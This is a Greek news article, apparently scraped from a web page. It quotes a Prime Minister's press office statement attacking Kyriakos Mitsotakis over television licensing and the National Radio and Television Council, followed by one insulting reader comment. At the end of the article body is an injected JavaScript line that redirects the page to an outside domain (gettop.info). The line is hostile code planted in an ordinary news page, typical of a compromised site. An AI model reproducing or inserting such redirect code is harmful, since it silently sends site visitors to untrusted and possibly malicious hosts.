Πρωθυπουργικό Γραφείο: Ας μην πανηγυρίζει τόσο πολύ ο κ. Μητσοτάκης γιατί εκτίθεται

1
6

 

«Ας μην πανηγυρίζει τόσο πολύ ο κ. Μητσοτάκης γιατί εκτίθεται», τονίζει το Γραφείο Τύπου του πρωθυπουργού σε ανακοίνωσή του, υπογραμμίζοντας ότι ο πρόεδρος της ΝΔ δεν ενδιαφέρεται για τη θεσμική νομιμότητα, αλλά να συνεχιστεί το καθεστώς αυθαιρεσίας.

Υπογραμμίζει δε ότι «είτε αρέσει στον πρόεδρο της ΝΔ, είτε όχι, η κυβέρνηση διατηρεί την νομοθετική πρωτοβουλία για την επιβολή της νομιμότητας στο ραδιοτηλεοπτικό τοπίο».

Ειδικότερα, αναφέρει ότι «ο κ. Μητσοτάκης πανηγυρίζει για την επαναφορά της διαδικασίας αδειοδότησης στο Εθνικό Ραδιοτηλεοπτικό Συμβούλιο. Και πανηγυρίζει προσπερνώντας το γεγονός ότι ο ίδιος και το κόμμα του είναι που υπονόμευσαν συστηματικά, ακόμα και πριν μερικές ημέρες, την συγκρότηση του Εθνικού Ραδιοτηλεοπτικού Συμβουλίου».

Το γραφείο Τύπου του πρωθυπουργού σημειώνει ότι «ο κ. Μητσοτάκης δεν ενδιαφέρεται για την θεσμική νομιμότητα», αλλά ότι, αντίθετα, «ενδιαφέρεται να μην γίνει διαγωνισμός για τις τηλεοπτικές άδειες και να συνεχίσει το καθεστώς αυθαιρεσίας, που η ΝΔ, το ΠΑΣΟΚ και η εγχώρια διαπλοκή επέβαλλαν επί 27 χρόνια σε βάρος του δημοσίου συμφέροντος».

«Ας μην μιλάνε αυτοί για Κράτος Δικαίου και αποτελεσματικότητα του κράτους», τονίζει.

Σημειώνει ακόμη: «Ο κ. Μητσοτάκης γνωρίζει πολύ καλά ότι ο νόμος 4339/2015 παραχωρεί στο ΕΣΡ περισσότερες αρμοδιότητες από οποιονδήποτε άλλον νόμο μέχρι σήμερα. Μεταξύ αυτών, φυσικά, και τις αρμοδιότητες αδειοδότησης». Και επισημαίνει πως «αν δεν υπάρχει σήμερα ΕΣΡ, αυτό οφείλεται στην αντισυνταγματική και αντιθεσμική στάση της Νέας Δημοκρατίας, που αποβλέπει στο να ματαιωθεί ο διαγωνισμός και να μην πληρώσουν αυτοί που κατέχουν δημόσιες συχνότητες».

«Προχωρώντας ένα βήμα παραπέρα, στην υπεράσπιση του καθεστώτος αυθαιρεσίας, ο κ. Μητσοτάκης έσπευσε σήμερα να τοποθετηθεί επί του αριθμού των αδειών. Αποδεικνύεται, έτσι, ότι η μέχρι εχθές θέση της Νέας Δημοκρατίας -ότι ο αριθμός των αδειών είναι αρμοδιότητα του ΕΣΡ- δεν ήταν τίποτα περισσότερο από τακτικού χαρακτήρα πρόσχημα».

«Είτε αρέσει στον πρόεδρο της ΝΔ, είτε όχι, η κυβέρνηση διατηρεί την νομοθετική πρωτοβουλία για την επιβολή της νομιμότητας στο ραδιοτηλεοπτικό τοπίο. Ας μην πανηγυρίζει τόσο πολύ ο κ. Μητσοτάκης γιατί εκτίθεται», τονίζει το γραφείο Τύπου του πρωθυπουργού. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

1 ΣΧΟΛΙΟ

  1. Η βλακεία τους δεν έχει όρια. Τους έφτυσαν και κάνουν πως βρέχει. Η στάση τους αποδεικνύει ολοφάνερα γιατί μπορούν και συνεργάζονται με τον δεξιό λαϊκιστή εθνικιστή Καμμένο.

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here